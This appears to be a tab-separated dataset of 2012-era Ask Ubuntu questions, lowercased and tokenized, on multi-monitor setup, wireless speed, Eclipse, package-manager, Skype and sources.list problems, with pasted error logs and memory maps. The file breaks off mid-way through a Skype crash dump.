220862	lightdm - enable 3 and then 4 monitors	i 've just completed a ubuntu 12.10 server build on a hp xw8400 desktop with 2 x geforce dual head dvi gphx cards . on the build bench i had 1 monitor connected & worked perfectly . 1920x1200 perfect i then plugged in a 2nd monitor into the 2nd dvi connector on gphx card 1 and that worked 1920x1200 perfect . when i connect a 3rd monitor into the 1st dvi connector on gphx card 2 , a mess of black ( grey ) and white pixels is displayed . no `` x '' from mouse movements is seen on the screen . the monitor works ok as i swapped it with one of the functioning ports on gphx card 1 and it displayed perfectly . monitors are all good . all monitors are hp lp2475w 's connecting with dvi ports to identical geforce cards i also have a 4th monitor which i 'd like to connect but want to see monitor # 3 operating correctly 1st . no alterations have been made to the `` ubuntu-desktop '' standard install available with tasksel . compositing is working fine on the 2 monitors also ... its actually a really sweet os and the machine is running very very fast ! ! ! ! i 'm dead impressed with 12.10 .
220863	wireless internet works on w7 and on university network but is extremely slow at home	i 'm using ubuntu 12.04 with an atheros wireless card . my internet speed in w7 is great . my internet speed in ubuntu 12.04 at a university network is great . my internet speed in ubuntu 12.04 at my home network is really slow . some solutions i have tried but did n't work : disabling ipv6 running the following code : sudo ifconfig wlan0 down sudo rmmod -f iwlwifi sudo modprobe iwlwifi 11n_disable=1 sudo ifconfig wlan0 up thanks for the help !
220865	how to install gnomebaker ?	how to install gnome baker ? after downloading the software-files , i ca n't find the executed file or how to navigate to launch to install it . thanks
220868	suspend problem	recently , my laptop does not suspend though i saw it going into suspend mode when i closed the lid of my sony vaio . the pc just suspends for 1 second then lights on immediately . how can i resolve this problem ?
220871	eclipse not running after upgrading to oracle jdk 1.7 ?	i upgraded from open-jdk to oracle jdk 1.7 today . since then my eclipse is n't running . and when i run eclipse i get the following error : - below are the logs from the file mentioned in the screenshot : - buffer @ ankit : ~/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration $ cat 1353661258260.log ! session 2012-11-23 14:30:57.677 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_09 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_in command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-11-23 14:31:03.518 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/buffer/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/buffer/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 )
220872	problem in repairing software center	what should be done regarding this error ( software center ) - installarchives ( ) failed : ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . extracting templates from packages : 90 % extracting templates from packages : 100 % preconfiguring packages ... ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . extracting templates from packages : 90 % extracting templates from packages : 100 % preconfiguring packages ... ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . extracting templates from packages : 90 % extracting templates from packages : 100 % preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . this error is repeating whenever i am repairing software center . i 'm having problems with my software center .. when i want to install some package that following message it appears '' items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? '' after i click repair , another window pops up , saying : '' package operation fails - the installation or removal of a software package failed '' i click repair , and a few seconds later , it pops up again ! ! ! ! no matter how many times i click repair , nothing happens . also .. i 've another problem with update manager that shows me the following message : '' the package system is broken . check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f '' also , i tried sudo apt-get install -f i got this error ... ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . extracting templates from packages : 100 % preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) please provide a solution
220875	konsole wo n't work !	i 've installed ubuntu 12.10 wubi , and konsole using sudo apt-get install konsole and it installed fine , but when i tried to open it , it does nothing ! i tried to reinstall it , multiple times , but the problem remains . can anyone help me ? ? ? [ edit ] : i forgot , konsole is working in kate ! ! !
220877	is there a text editor for html files that actually breaks down the content of the file into openable columns ?	i am wondering if there is a file editor for ubuntu that can open and close the different parts of the html file as in the screenshot below : '' menu a '' here has a little icon that i can click and the whole thing would be folded in and that way i can see the different parts of the file better . or can gedit do this ?
220879	edit label is inactive in glade	i am using quickly to create ubuntu-applications . i am follwing the tutorial presented in the line http : //developer.ubuntu.com/get-started/ when i add a toolbutton to the tool bar , i am unable to edit the label . the edit label option is greyed out .
220882	can i use quicky to create enterprise applications ?	recently i started using quickly to create ubuntu applications and i was exploring the possibility of using quickly to create scalable enterprise applications . can i use quicky to create such enterprise applications ?
220886	control external monitor brightness via software	hello ubuntu community , i can control the brightness of my dell u2713hm connected with displayport via the command : ddccontrol -p -r 0x10 -w 53 where in this example the number 53 represents the brightness level ( range 0 to 100 ) . but i do n't know how to link the command to my brightness keys on my keyboard . i searched already , but just found answers to integrated laptop screens . in /sys/class/backlight is the folder acpi_video0 with some subfolders and files . the file actual_brightness contains a number from 0 to 20 , which is changing when i press the brightness keys . how do i get my external monitor listed as a device in /sys/class/backlight ? ps : i am running a fresh ubuntu 12.10 install with integrated graphics intel hd4000 .
220888	will gtk3 applications run in mate ?	mate , the gnome 2 fork is still using gtk3 , although i think they have plans to migrate to gtk3 in the future . currently , is it possible to run gtk3 applications in mate ?
220891	can not install softwares	i have ubuntu 12.10 on my laptop . when i try to install vlc , i get this error e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what to do ? i ca n't install other softwares too . also , mp3 files do n't play . it shows error that mpehg-1 layer3 decoder not found .
220893	wireless will not work with an intel 5100 wireless card	i did a fresh ubuntu 12.04 install on my sony vaio laptop , which worked perfectly with 10.04 . now my wireless wo n't work . i have read just about every q & a on the subject and i have tried different solutions , including the official troubleshooting guides . my laptop is equipped with a intel 5100 wireless device . ubuntu recognizes the device and it 's status is given as connected in nm-tool . i can ping the gateway , my own ip number and localhost . rfkill shows no soft or hard blocks . i can ping 8.8.8.8 . average time is about 15ms . any ideas ? i am just a few hours shy of reinstalling good old 10.04 !
220896	android emulator - ubuntu 12.04	when i type in the command emulator @ andreud where 'andreud ' is the name of the avd i created , it gives the following errors pvrdriinitpvr2d : pvr2d device index ( 0 ) failed to load libgl.so error libgl.so : can not open shared object file : no such file or directory failed to load libgl.so error libgl.so : can not open shared object file : no such file or directory and a blank screen in the emulator window , where i should get android home screen , icons , etc shows up . as per a comment i tried installing ia32-libs aneesh @ nb14 : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs ' has no installation candidate i want the home screen to appear . any help is greatly appreciated .
220897	ubuntu has lts and normal version now . does lubuntu have the same ?	i am wondering if this is the right place for this question , but if not ... then the moderators will surely tell me so . anyway ... .there is ubuntu 12.04 lts and the normal 12.10 version . is that the same with lubuntu ? on their site , for some reason , they seem to be promoting the 12.10 version while for me an lts is always more appealing . i am wondering if they have the same ideology as the ubuntu team . update : is it okay to talk about lubuntu here at all ? i understand that it is a flavour of ubuntu ... but still . are they 2 very different teams ?
220905	how to remove limit on core dump file size	i would like to increase the maximum size limit for core dump files as a regular user . using bash , i can set it like this : $ ulimit -c 100 which works well the first time i set it . however , the next time i use this command , i can only set this limit to a value not exceeding 100 . in general , i can set it to an arbitrary value only the first time i use this command since login . all the next times , the possible values are limited from above by the initially set value . how can i make this persistent across multiple uses of the command ?
220906	how to access gnome-power-manager in lubuntu ?	i have decided to replace xfce4-power-manager with gnome-power-manager in lubuntu 12.04 ( did n't knew how to disable the tray icon in fact ) , which i did using synaptic , and now it shows : but gnome-power-manager is nowhere to be found . searching for the file , i only see this : there is only /usr/bin/gnome-power-statistics should n't be a gnome-power-manager executable and with options that should look like in this question ?
220907	how to recover a deleted /usr partition ?	accidently i formated my /usr partition of my kubuntu in my windows xp systems . is there any way to revover the /usr partition ?
220911	monitor internet usage	i use vnstat to monitor internet data usage over wlan interface but since i also stream videos from my file server ... the results are inaccurate . is there any way to seperate data downloaded from internet from data streamed from file server in vnstat ? or any program that will let me monitor monthly internet usage only ( ignoring the data usage produced by the streaming ) ?
220913	pdf viewer in chromium ?	google chrome has plugin to view pdf files inside the browser . is there any plugin for chromium which can do this ?
220917	i ca n't install vim on my terminal	whenever i try to execute vim , the terminal shows this : the program 'vim ' can be found in the following packages : * vim * vim-gnome * vim-tiny * vim-athena * vim-gtk * vim-nox try : sudo apt-get install < selected package > so i tried what most of my classmates had done , sudo apt-get update and sudo apt-get install vim but it did n't work . the terminal shows this message after i entered sudo apt-get install vim reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim ' has no installation candidate thanks for the answers
220921	how to make an indicator for ubuntu ? ( because tray is useless )	so as more of you know , ubuntu has dropped the whole thing about tray and bringed something new called indicators.. as far as i know qt creator ( ide ) is able to make only a tray and not an indicator ( just to mention there is a package in ubuntu called sni-qt which comes preinstalled , that can show tray icons but they lose a lot of their abilities like left clicking , scrolling at tray and others ) .. i think the same question was asked here ( using appindicators with the qt framework ) and one of the answers was for this package ( https : //launchpad.net/ubuntu/+source/appmenu-qt ) .. with this package will i be able to create indicators with qt ? ( if yes how ? ) if i am not able to create an indicator with qt , should i use a more native ide to create an external executable which only thing it does will be to show the indicator ? if yes , will that one be with quickly ? if yes could u give one-two links to help me create an indicator ?
220923	error message when opening synaptic source list line 57	it seems there is a problem in my source list which i cant find ; everytime i try to open synaptic this error appears : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . on opening my source list , line 57 doesnt seem to exist , this is it ; ( im a new user and can only post two hyperlinks - these are the last two lines and i suspect one of them is the problem ... ) deb-src http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //archive.canonical.com partner i have tried seraching for a solution and have found similar problems , just not sure which line i should delete/replace ... # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //de.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution deb http : //de.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal universe deb http : //de.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //de.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //de.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-updates multiverse > # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse > # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner > # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //archive.canonical.com partner
220929	evolution crashes when trying to answer a message or foward	i have installed ubuntu 12.10 and use evolution 3.6.0 ( integrated e-mail system ) with an account in gmail , when i try to answer a message or foward it , the system crash without any error message . any clue ? regards , carlos
220931	skype installation problem 12.04	after an sudo apt-get update and sudo apt-get dist-upgrade , the following error appear : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install' to correct these . the following packages have unmet dependencies : skype-bin : i386 : breaks : skype ( < 4.1.0.20.0-0ubuntu0.12.04.1 ) but 4.1.0.20-0ubuntu0.11.10.2 is installed e : unmet dependencies . try using -f. then i try sudo apt-get -f install and the following error appear : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : skype the following packages will be upgraded : skype 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/15.3 kb of archives . after this operation , 4,096 b disk space will be freed . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of skype : skype-bin : i386 ( 4.1.0.20.0-0ubuntu0.12.04.1 ) breaks skype ( < < 4.1.0.20.0-0ubuntu0.12.04.1 ) and is installed . version of skype to be configured is 4.1.0.20-0ubuntu0.11.10.2 . dpkg : error processing skype ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : skype e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i update my skype and sort out this problem ? i 'm on ubuntu 12.04 64bit and the following is showed in the graphical update manager . changes for the versions : installed version : 4.1.0.20-0ubuntu0.11.10.2 available version : 4.1.0.20.0-0ubuntu0.12.04.1
220933	can anyone tell me why on the lubuntu website there are 2 different sizes of the same installer ?	i decided to download lubuntu 12.10 and if i click on the regular download ... i get a 699 mb file . if i opt for the torrent , i get a 733 mb file . is this normal ? or the 733-mb file comes with some updates ? in fact ... ..no matter where you download it from , it is a 733-mb file , but for some reason ... .while it is being downloaded , it shows that a 699-mb file is being downloaded . weird .
220936	why does my skype crash ?	skype worked great since i installed it when omg ! ubuntu ! came with that this article . but randomly now it does n't work . when i type skype into the terminal i get this : jeggy @ jeggy-xps : ~ $ skype /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:10592 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:10592 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:10592 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( skype:10592 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/bin/pulseaudio : error while loading shared libraries : libpulsecommon-1.1.so : can not open shared object file : no such file or directory /usr/bin/pulseaudio : error while loading shared libraries : libpulsecommon-1.1.so : can not open shared object file : no such file or directory *** glibc detected *** skype : free ( ) : invalid pointer : 0xf766eef0 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x75ee2 ) [ 0xf4951ee2 ] /usr/lib/i386-linux-gnu/libasound.so.2 ( snd_config_substitute+0x6d ) [ 0xf766960d ] /usr/lib/i386-linux-gnu/libasound.so.2 ( +0x22158 ) [ 0xf766b158 ] /usr/lib/i386-linux-gnu/libasound.so.2 ( snd_config_update_r+0x229 ) [ 0xf766bdc9 ] /usr/lib/i386-linux-gnu/libasound.so.2 ( snd_config_update+0x48 ) [ 0xf766c358 ] /usr/lib/i386-linux-gnu/libasound.so.2 ( snd_pcm_open+0x3f ) [ 0xf768dd2f ] skype [ 0x92354d6 ] skype [ 0x9235dd9 ] skype [ 0x908dc79 ] skype [ 0x8ef3c67 ] skype [ 0x8ef2b81 ] skype [ 0x8e9c52a ] skype [ 0x8e9c40e ] skype [ 0x8edfe5e ] skype [ 0x8ddea3e ] skype [ 0x8deca5f ] skype [ 0x8b24455 ] ======= memory map : ======== 08048000-09ac4000 rwxp 00000000 08:06 19403540 /usr/bin/skype 09ac5000-09b42000 r-xp 01a7c000 08:06 19403540 /usr/bin/skype 09b42000-09b54000 rwxp 01af9000 08:06 19403540 /usr/bin/skype 09b54000-09bf4000 rwxp 00000000 00:00 0 0ba37000-0c3c1000 rwxp 00000000 00:00 0 [ heap ] ddafd000-ddafe000 -- -p 00000000 00:00 0 ddafe000-de2fe000 rwxp 00000000 00:00 0 de2fe000-de2ff000 -- -p 00000000 00:00 0 de2ff000-deaff000 rwxp 00000000 00:00 0 e0900000-e09fe000 rwxp 00000000 00:00 0 e09fe000-e0a00000 -- -p 00000000 00:00 0 e0b00000-e0bfe000 rwxp 00000000 00:00 0 e0bfe000-e0c00000 -- -p 00000000 00:00 0 e0c00000-e0cfe000 rwxp 00000000 00:00 0 e0cfe000-e0d00000 -- -p 00000000 00:00 0 e0d00000-e0dcc000 rwxp 00000000 00:00 0 e0dcc000-e0e00000 -- -p 00000000 00:00 0 e0e00000-e0efe000 rwxp 00000000 00:00 0 e0efe000-e0f00000 -- -p 00000000 00:00 0 e0f00000-e0ffe000 rwxp 00000000 00:00 0 e0ffe000-e1000000 -- -p 00000000 00:00 0 e1000000-e10ce000 rwxp 00000000 00:00 0 e10ce000-e1100000 -- -p 00000000 00:00 0 e1aff000-e1b00000 -- -p 00000000 00:00 0 e1b00000-e2300000 rwxp 00000000 00:00 0 e2300000-e23fe000 rwxp 00000000 00:00 0 e23fe000-e2400000 -- -p 00000000 00:00 0 e2500000-e25fe000 rwxp 00000000 00:00 0 e25fe000-e2600000 -- -p 00000000 00:00 0 e2600000-e26fe000 rwxp 00000000 00:00 0 e26fe000-e2700000 -- -p 00000000 00:00 0 e2700000-e27fe000 rwxp 00000000 00:00 0 e27fe000-e2800000 -- -p 00000000 00:00 0 e2800000-e28fe000 rwxp 00000000 00:00 0 e28fe000-e2900000 -- -p 00000000 00:00 0 e2900000-e29fe000 rwxp 00000000 00:00 0 e29fe000-e2a00000 -- -p 00000000 00:00 0 e2a00000-e2afe000 rwxp 00000000 00:00 0 e2afe000-e2b00000 -- -p 00000000 00:00 0 e2b00000-e2bfe000 rwxp 00000000 00:00 0 e2bfe000-e2c00000 -- -p 00000000 00:00 0 e2c00000-e2cfe000 rwxp 00000000 00:00 0 e2cfe000-e2d00000 -- -p 00000000 00:00 0 e2d00000-e2dfe000 rwxp 00000000 00:00 0 e2dfe000-e2e00000 -- -p 00000000 00:00 0 e2e00000-e2efe000 rwxp 00000000 00:00 0 e2efe000-e2f00000 -- -p 00000000 00:00 0 e2f00000-e2ffe000 rwxp 00000000 00:00 0 e2ffe000-e3000000 -- -p 00000000 00:00 0 e3000000-e30fe000 rwxp 00000000 00:00 0 e30fe000-e3100000 -- -p 00000000 00:00 0 e3100000-e31fe000 rwxp 00000000 00:00 0 e31fe000-e3200000 -- -p 00000000 00:00 0 e3b00000-e3bfe000 rwxp 00000000 00:00 0 e3bfe000-e3c00000 -- -p 00000000 00:00 0 e3c00000-e3cfe000 rwxp 00000000 00:00 0 e3cfe000-e3d00000 -- -p 00000000 00:00 0 e3d00000-e3dfe000 rwxp 00000000 00:00 0 e3dfe000-e3e00000 -- -p 00000000 00:00 0 e3e00000-e3efe000 rwxp 00000000 00:00 0 e3efe000-e3f00000 -- -p 00000000 00:00 0 e3f00000-e3ffe000 rwxp 00000000 00:00 0 e3ffe000-e4000000 -- -p 00000000 00:00 0 e4000000-e40fe000 rwxp 00000000 00:00 0 e40fe000-e4100000 -- -p 00000000 00:00 0 e4100000-e41fe000 rwxp 00000000 00:00 0 e41fe000-e4200000 -- -p 00000000 00:00 0 e42ff000-e4300000 -- -p 00000000 00:00 0 e4300000-e4b00000 rwxp 00000000 00:00 0 [ stack:10616 ] e4b00000-e4bfe000 rwxp 00000000 00:00 0 e4bfe000-e4c00000 -- -p 00000000 00:00 0 e4d00000-e4dfe000 rwxp 00000000 00:00 0 e4dfe000-e4e00000 -- -p 00000000 00:00 0 e4e00000-e4efe000 rwxp 00000000 00:00 0 e4efe000-e4f00000 -- -p 00000000 00:00 0 e4f00000-e4ffe000 rwxp 00000000 00:00 0 e4ffe000-e5000000 -- -p 00000000 00:00 0 e5000000-e50fe000 rwxp 00000000 00:00 0 e50fe000-e5100000 -- -p 00000000 00:00 0 e5100000-e51fe000 rwxp 00000000 00:00 0 e51fe000-e5200000 -- -p 00000000 00:00 0 e5200000-e52fe000 rwxp 00000000 00:00 0 e52fe000-e5300000 -- -p 00000000 00:00 0 e5300000-e53fe000 rwxp 00000000 00:00 0 e53fe000-e5400000 -- -p 00000000 00:00 0 e5500000-e5600000 rwxp 00000000 00:00 0 e5600000-e56f1000 rwxp 00000000 00:00 0 e56f1000-e5700000 -- -p 00000000 00:00 0 e5700000-e57ff000 rwxp 00000000 00:00 0 e57ff000-e5800000 -- -p 00000000 00:00 0 e5800000-e58f1000 rwxp 00000000 00:00 0 e58f1000-e5900000 -- -p 00000000 00:00 0 e5900000-e59f1000 rwxp 00000000 00:00 0 e59f1000-e5a00000 -- -p 00000000 00:00 0 e5a00000-e5af1000 rwxp 00000000 00:00 0 e5af1000-e5b00000 -- -p 00000000 00:00 0 e5b00000-e5bf1000 rwxp 00000000 00:00 0 e5bf1000-e5c00000 -- -p 00000000 00:00 0 e5c00000-e5cf1000 rwxp 00000000 00:00 0 e5cf1000-e5d00000 -- -p 00000000 00:00 0 e5d00000-e5df1000 rwxp 00000000 00:00 0 e5df1000-e5e00000 -- -p 00000000 00:00 0 e5e00000-e5ef1000 rwxp 00000000 00:00 0 e5ef1000-e5f00000 -- -p 00000000 00:00 0 e5f00000-e5ff1000 rwxp 00000000 00:00 0 e5ff1000-e6000000 -- -p 00000000 00:00 0 e6000000-e60f1000 rwxp 00000000 00:00 0 e60f1000-e6100000 -- -p 00000000 00:00 0 e6100000-e61f1000 rwxp 00000000 00:00 0 e61f1000-e6200000 -- -p 00000000 00:00 0 e6200000-e62f1000 rwxp 00000000 00:00 0 e62f1000-e6300000 -- -p 00000000 00:00 0 e6300000-e63f1000 rwxp 00000000 00:00 0 e63f1000-e6400000 -- -p 00000000 00:00 0 e6400000-e64f1000 rwxp 00000000 00:00 0 e64f1000-e6500000 -- -p 00000000 00:00 0 e6500000-e65f1000 rwxp 00000000 00:00 0 e65f1000-e6600000 -- -p 00000000 00:00 0 e666d000-e666e000 -- -p 00000000 00:00 0 e666e000-e6e6e000 rwxp 00000000 00:00 0 e6e6e000-e6e6f000 -- -p 00000000 00:00 0 e6e6f000-e78bb000 rwxp 00000000 00:00 0 [ stack:10612 ] e7989000-e798a000 rwxp 00000000 00:00 0 e7997000-e79db000 r-xp 00000000 08:06 10879065 /usr/share/fonts/truetype/msttcorefonts/arial.ttf e7a3b000-e7a3f000 rwxp 00000000 00:00 0 e7aad000-e7ab1000 rwxp 00000000 00:00 0 e7aca000-e7bca000 rwxp 00000000 00:00 0 e7bd8000-e7cf8000 rwxp 00000000 00:00 0 e7e44000-e8254000 rwxp 00000000 00:00 0 e8254000-e8255000 -- -p 00000000 00:00 0 e8255000-e8b55000 rwxp 00000000 00:00 0 [ stack:10611 ] e8b55000-e8ce7000 r-xp 00000000 08:06 17695016 /lib/i386-linux-gnu/libcrypto.so.1.0.0 e8ce7000-e8cf6000 r-xp 00192000 08:06 17695016 /lib/i386-linux-gnu/libcrypto.so.1.0.0 e8cf6000-e8cfd000 rwxp 001a1000 08:06 17695016 /lib/i386-linux-gnu/libcrypto.so.1.0.0 e8cfd000-e8d00000 rwxp 00000000 00:00 0 e8d00000-e8e00000 rwxp 00000000 00:00 0 e8efe000-e8eff000 -- -p 00000000 00:00 0 e8eff000-e96ff000 rwxp 00000000 00:00 0 [ stack:10609 ] e96ff000-e9700000 -- -p 00000000 00:00 0 e9700000-e9f00000 rwxp 00000000 00:00 0 [ stack:10608 ] e9f00000-e9f45000 rwxp 00000000 00:00 0 e9f45000-ea000000 -- -p 00000000 00:00 0 ea0fe000-ea0ff000 -- -p 00000000 00:00 0 ea0ff000-ea8ff000 rwxp 00000000 00:00 0 [ stack:10607 ] ea8ff000-ea900000 -- -p 00000000 00:00 0 ea900000-eb100000 rwxp 00000000 00:00 0 [ stack:10606 ] eb100000-eb1fd000 rwxp 00000000 00:00 0 eb1fd000-eb200000 -- -p 00000000 00:00 0 eb200000-eb2fd000 rwxp 00000000 00:00 0 eb2fd000-eb300000 -- -p 00000000 00:00 0 eb300000-eb321000 rwxp 00000000 00:00 0 eb321000-eb400000 -- -p 00000000 00:00 0 eb49e000-eb4fe000 rwxs 00000000 00:04 6422542 /sysv00000000 ( deleted ) eb4fe000-eb4ff000 -- -p 00000000 00:00 0 eb4ff000-ebcff000 rwxp 00000000 00:00 0 [ stack:10615 ] ebcff000-ebd00000 -- -p 00000000 00:00 0 ebd00000-ec500000 rwxp 00000000 00:00 0 [ stack:10604 ] ec500000-ec5ed000 rwxp 00000000 00:00 0 ec5ed000-ec600000 -- -p 00000000 00:00 0 ec645000-ec6fe000 rwxs 00000000 00:04 6389773 /sysv00000000 ( deleted ) ec6fe000-ec6ff000 -- -p 00000000 00:00 0 ec6ff000-eceff000 rwxp 00000000 00:00 0 [ stack:10603 ] eceff000-ecf00000 -- -p 00000000 00:00 0 ecf00000-ed700000 rwxp 00000000 00:00 0 [ stack:10602 ] ed700000-ed7d0000 rwxp 00000000 00:00 0 ed7d0000-ed800000 -- -p 00000000 00:00 0 ed800000-ed8f8000 rwxp 00000000 00:00 0 ed8f8000-ed900000 -- -p 00000000 00:00 0 ed900000-ed9ed000 rwxp 00000000 00:00 0 ed9ed000-eda00000 -- -p 00000000 00:00 0 eda2c000-eda7e000 r-xp 00000000 08:06 20188577 /usr/share/fonts/truetype/ubuntu-font-family/ubuntu-b.ttf edaff000-edb00000 -- -p 00000000 00:00 0 edb00000-ee300000 rwxp 00000000 00:00 0 [ stack:10610 ] ee300000-ee3ed000 rwxp 00000000 00:00 0 ee3ed000-ee400000 -- -p 00000000 00:00 0 ee434000-ee439000 r-xp 00000000 08:06 17694947 /lib/i386-linux-gnu/libnss_dns-2.15.so ee439000-ee43a000 r-xp 00004000 08:06 17694947 /lib/i386-linux-gnu/libnss_dns-2.15.so ee43a000-ee43b000 rwxp 00005000 08:06 17694947 